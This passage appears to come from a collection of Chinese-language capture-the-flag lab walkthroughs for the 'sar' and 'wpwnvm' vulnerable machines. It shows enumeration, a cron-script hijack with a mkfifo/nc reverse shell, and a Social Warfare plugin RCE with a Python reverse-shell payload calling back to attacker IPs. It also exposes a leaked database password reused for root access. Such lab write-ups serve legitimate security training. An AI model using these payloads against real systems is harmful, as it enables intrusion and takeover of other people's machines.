drwxr-xr-x 3 www-data www-data 4096 Mar 19 2019 sarFILE 194 | 195 | www-data@sar:/var/www/html/sar2HTML$ cd /tmp 196 | cd /tmp 197 | www-data@sar:/tmp$ ls -al 198 | ls -al 199 | total 8 200 | drwxrwxrwt 2 root root 4096 Jul 21 09:05 . 201 | drwxr-xr-x 24 root root 4096 Oct 20 2019 .. 202 | www-data@sar:/tmp$ wget http://192.168.146.63/linpeas.sh 203 | wget http://192.168.146.63/linpeas.sh 204 | --2022-07-21 09:34:54-- http://192.168.146.63/linpeas.sh 205 | Connecting to 192.168.146.63:80... connected. 206 | HTTP request sent, awaiting response... 200 OK 207 | Length: 776967 (759K) [text/x-sh] 208 | Saving to: 'linpeas.sh' 209 | 210 | linpeas.sh 100%[===================>] 758.76K --.-KB/s in 0.006s 211 | 212 | 2022-07-21 09:34:54 (116 MB/s) - 'linpeas.sh' saved [776967/776967] 213 | 214 | ``` 215 | #### 获取关键信息 216 | ``` 217 | ╔══════════╣ Executing Linux Exploit Suggester 218 | ╚ https://github.com/mzet-/linux-exploit-suggester 219 | cat: write error: Broken pipe 220 | cat: write error: Broken pipe 221 | [+] [CVE-2021-4034] PwnKit 222 | 223 | Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt 224 | Exposure: probable 225 | Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro 226 | Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main 227 | 228 | [+] [CVE-2021-3156] sudo Baron Samedit 229 | 230 | Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt 231 | Exposure: probable 232 | Tags: mint=19,[ ubuntu=18|20 ], debian=10 233 | Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main 234 | 235 | [+] [CVE-2021-3156] sudo Baron Samedit 2 236 | 237 | Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt 238 | Exposure: probable 239 | Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10 240 | Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main 241 | 242 | [+] [CVE-2021-22555] Netfilter heap out-of-bounds write 243 | 244 | Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html 245 | Exposure: less probable 246 | Tags: ubuntu=20.04{kernel:5.8.0-*} 247 | Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c 248 | ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c 249 | Comments: ip_tables kernel module must be loaded 250 | 251 | [+] [CVE-2019-18634] sudo pwfeedback 252 | 253 | Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ 254 | Exposure: less probable 255 | Tags: mint=19 256 | Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c 257 | Comments: sudo configuration requires pwfeedback to be enabled. 258 | 259 | [+] [CVE-2019-15666] XFRM_UAF 260 | 261 | Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc 262 | Exposure: less probable 263 | Download URL: 264 | Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled 265 | 266 | [+] [CVE-2017-0358] ntfs-3g-modprobe 267 | 268 | Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072 269 | Exposure: less probable 270 | Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2} 271 | Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip 272 | Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores. 273 | 274 | 275 | 276 | PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 277 | 278 | 17 * * * * root cd / && run-parts --report /etc/cron.hourly 279 | 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 280 | 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 281 | 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) 282 | */5 * * * * root cd /var/www/html/ && sudo ./finally.sh 283 | 284 | ``` 285 | ``` 286 | www-data@sar:/tmp$ cd /var/www/html 287 | cd /var/www/html 288 | www-data@sar:/var/www/html$ ls 289 | ls 290 | finally.sh index.html phpinfo.php robots.txt sar2HTML write.sh 291 | www-data@sar:/var/www/html$ cat finally.sh 292 | cat finally.sh 293 | #!/bin/sh 294 | 295 | ./write.sh 296 | www-data@sar:/var/www/html$ cat write.sh 297 | cat write.sh 298 | #!/bin/sh 299 | 300 | touch /tmp/gateway 301 | www-data@sar:/var/www/html$ ls -al 302 | ls -al 303 | total 40 304 | drwxr-xr-x 3 www-data www-data 4096 Oct 21 2019 . 305 | drwxr-xr-x 5 www-data www-data 4096 Jul 21 09:35 .. 306 | -rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh 307 | -rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html 308 | -rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php 309 | -rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt 310 | drwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 sar2HTML 311 | -rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.sh 312 | www-data@sar:/var/www/html$ 313 | 314 | ``` 315 | ### 提权成功 316 | ``` 317 | echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.146.63 4445 >/tmp/f" > write.sh 318 | < -i 2>&1|nc 192.168.146.63 4445 >/tmp/f" > write.sh 319 | 320 | 321 | └─$ nc -nvlp 4445 130 ⨯ 322 | listening on [any] 4445 ... 323 | connect to [192.168.146.63] from (UNKNOWN) [192.168.146.58] 53684 324 | /bin/sh: 0: can't access tty; job control turned off 325 | # id 326 | uid=0(root) gid=0(root) groups=0(root) 327 | # whoami 328 | root 329 | # ip a 330 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 331 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 332 | inet 127.0.0.1/8 scope host lo 333 | valid_lft forever preferred_lft forever 334 | inet6 ::1/128 scope host 335 | valid_lft forever preferred_lft forever 336 | 2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000 337 | link/ether 00:0c:29:8a:ff:1a brd ff:ff:ff:ff:ff:ff 338 | inet 192.168.146.58/24 brd 192.168.146.255 scope global dynamic noprefixroute ens33 339 | valid_lft 69284sec preferred_lft 69284sec 340 | inet6 fe80::2009:6d57:8178:339f/64 scope link noprefixroute 341 | valid_lft forever preferred_lft forever 342 | # ls 343 | finally.sh 344 | index.html 345 | phpinfo.php 346 | robots.txt 347 | sar2HTML 348 | write.sh 349 | # cd 350 | # ls 351 | root.txt 352 | # cat root.txt 353 | 66f93d6b2ca96c9ad78a8a9ba0008e99 354 | # 355 | 356 | ``` 357 | -------------------------------------------------------------------------------- /Target Notes/wpwnvm.md: -------------------------------------------------------------------------------- 1 | # wpwnvm 2 | ## 信息收集 3 | ### 端口枚举 4 | ``` 5 | ┌──(aaron㉿aacai)-[~/Desktop/wpwnvm] 6 | └─$ sudo nmap -p- 192.168.146.65 7 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 17:27 HKT 8 | Nmap scan report for 192.168.146.65 9 | Host is up (0.00023s latency). 10 | Not shown: 65533 closed tcp ports (reset) 11 | PORT STATE SERVICE 12 | 22/tcp open ssh 13 | 80/tcp open http 14 | MAC Address: 00:0C:29:F9:0B:60 (VMware) 15 | 16 | Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds 17 | 18 | └─$ sudo nmap -p22,80 -sV -A 192.168.146.65 19 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 17:27 HKT 20 | Nmap scan report for 192.168.146.65 21 | Host is up (0.00027s latency). 22 | 23 | PORT STATE SERVICE VERSION 24 | 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 25 | | ssh-hostkey: 26 | | 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA) 27 | | 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA) 28 | |_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519) 29 | 80/tcp open http Apache httpd 2.4.38 ((Debian)) 30 | |_http-title: Site doesn't have a title (text/html). 31 | |_http-server-header: Apache/2.4.38 (Debian) 32 | MAC Address: 00:0C:29:F9:0B:60 (VMware) 33 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 34 | Device type: general purpose 35 | Running: Linux 4.X|5.X 36 | OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 37 | OS details: Linux 4.15 - 5.6 38 | Network Distance: 1 hop 39 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 40 | 41 | TRACEROUTE 42 | HOP RTT ADDRESS 43 | 1 0.27 ms 192.168.146.65 44 | 45 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 46 | Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds 47 | 48 | ``` 49 | 这个靶机只有一个80和22端口开着, 那么入口就在网页端了 50 | ### Web信息枚举 51 | ![Img](../FILES/wpwnvm/img-20220814173522.png) 52 | 直接访问是一个建设中的页面 53 |
54 | 使用dirsearch查看一下可访问的 55 | ``` 56 | [17:36:12] 200 - 134B - /index.html 57 | [17:36:21] 200 - 57B - /robots.txt 58 | [17:36:32] 200 - 7KB - /wordpress/wp-login.php 59 | [17:36:32] 200 - 27KB - /wordpress/ 60 | 61 | ``` 62 | ![Img](../FILES/wpwnvm/img-20220814173742.png) 63 | 64 |
65 | robots.txt是一个fake的信息... 66 |
67 | 但是这是一个wordpress, 那直接上wpscan 68 |
69 | TIP: 在这里我用了wpscan的api, 直接扫描出了可能有关的漏洞 70 | ``` 71 | i] Plugin(s) Identified: 72 | 73 | [+] social-warfare 74 | | Location: http://192.168.146.65/wordpress/wp-content/plugins/social-warfare/ 75 | | Last Updated: 2021-07-20T16:09:00.000Z 76 | | [!] The version is out of date, the latest version is 4.3.0 77 | | 78 | | Found By: Comment (Passive Detection) 79 | | 80 | | [!] 2 vulnerabilities identified: 81 | | 82 | | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update 83 | | Fixed in: 3.5.3 84 | | References: 85 | | - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972 86 | | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978 87 | | - https://wordpress.org/support/topic/malware-into-new-update/ 88 | | - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/ 89 | | - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/ 90 | | - https://twitter.com/warfareplugins/status/1108826025188909057 91 | | - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/ 92 | | 93 | | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE) 94 | | Fixed in: 3.5.3 95 | | References: 96 | | - https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618 97 | | - https://www.webarxsecurity.com/social-warfare-vulnerability/ 98 | | 99 | | Version: 3.5.2 (100% confidence) 100 | | Found By: Comment (Passive Detection) 101 | | - http://192.168.146.65/wordpress/, Match: 'Social Warfare v3.5.2' 102 | | Confirmed By: 103 | | Readme - Stable Tag (Aggressive Detection) 104 | | - http://192.168.146.65/wordpress/wp-content/plugins/social-warfare/readme.txt 105 | | Readme - ChangeLog Section (Aggressive Detection) 106 | | - http://192.168.146.65/wordpress/wp-content/plugins/social-warfare/readme.txt 107 | 108 | ``` 109 | 110 | 尝试枚举用户 111 | ``` 112 | i] User(s) Identified: 113 | 114 | [+] admin 115 | | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) 116 | | Confirmed By: Login Error Messages (Aggressive Detection) 117 | ``` 118 | 在上面使用wpscan的时候, 有一个100%命中的插件, social warfare, 那我们用searchspolit试试 119 | ![Img](../FILES/wpwnvm/img-20220814175756.png) 120 | 竟然是一个RCE, 拉下来查看一下代码 121 | ![Img](../FILES/wpwnvm/img-20220814175833.png) 122 | path在wp-admin下面的post处, 那我们就直接根据漏洞的path来获取我们的shell 123 | ![Img](../FILES/wpwnvm/img-20220814181711.png) 124 | ``` 125 | 

system('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.146.50",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);\'')
126 | ``` 127 | 在本地起监听端口, 同时使用python3去起一个http服务 128 | ``` 129 | └─$ sudo python3 -m http.server 80 130 | [sudo] password for aaron: 131 | Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 132 | 133 | ┌──(aaron㉿aacai)-[~/Desktop/wpwnvm] 134 | └─$ nc -lvnp 4444 135 | listening on [any] 4444 ... 136 | connect to [192.168.146.50] from (UNKNOWN) [192.168.146.65] 49886 137 | 138 | ``` 139 | 140 | 然后我们再用curl去访问本地, 这样我们就突破边界拿到了靶机的用户权限 141 | ![Img](../FILES/wpwnvm/img-20220814182138.png) 142 | ## 提升权限 143 | ### 查看wordpress文件 144 | ``` 145 | www-data@wpwn:/var/www/html/wordpress$ ls 146 | ls 147 | index.php 148 | license.txt 149 | readme.html 150 | wp-activate.php 151 | wp-admin 152 | wp-blog-header.php 153 | wp-comments-post.php 154 | wp-config-sample.php 155 | wp-config.php 156 | wp-content 157 | wp-cron.php 158 | wp-includes 159 | wp-links-opml.php 160 | wp-load.php 161 | wp-login.php 162 | wp-mail.php 163 | wp-settings.php 164 | wp-signup.php 165 | wp-trackback.php 166 | xmlrpc.php 167 | 168 | ``` 169 | 可以看到wp-config.php 170 | ``` 171 | /** The name of the database for WordPress */ 172 | define( 'DB_NAME', 'wordpress_db' ); 173 | 174 | /** MySQL database username */ 175 | define( 'DB_USER', 'wp_user' ); 176 | 177 | /** MySQL database password */ 178 | define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' ); 179 | 180 | /** MySQL hostname */ 181 | define( 'DB_HOST', 'localhost' ); 182 | 183 | /** Database Charset to use in creating database tables. */ 184 | define( 'DB_CHARSET', 'utf8mb4' ); 185 | 186 | /** The Database Collate type. Don't change this if in doubt. */ 187 | define( 'DB_COLLATE', '' ); 188 | 189 | ``` 190 | 然后我们来利用python获取可交互式的shell, 尝试使用这个密码登录另一个用户 191 | ![Img](../FILES/wpwnvm/img-20220814182655.png) 192 | 193 |
194 | 登录上来了! 195 | 196 |
197 | 查看sudo -l, 发现这个用户可以执行所有的sudo权限. 198 |
199 | 200 | ![Img](../FILES/wpwnvm/img-20220814182845.png) 201 | 202 | 那就直接sudo su 203 | ![Img](../FILES/wpwnvm/img-20220814182827.png) 204 | 205 |
206 | 提权成功 207 | --------------------------------------------------------------------------------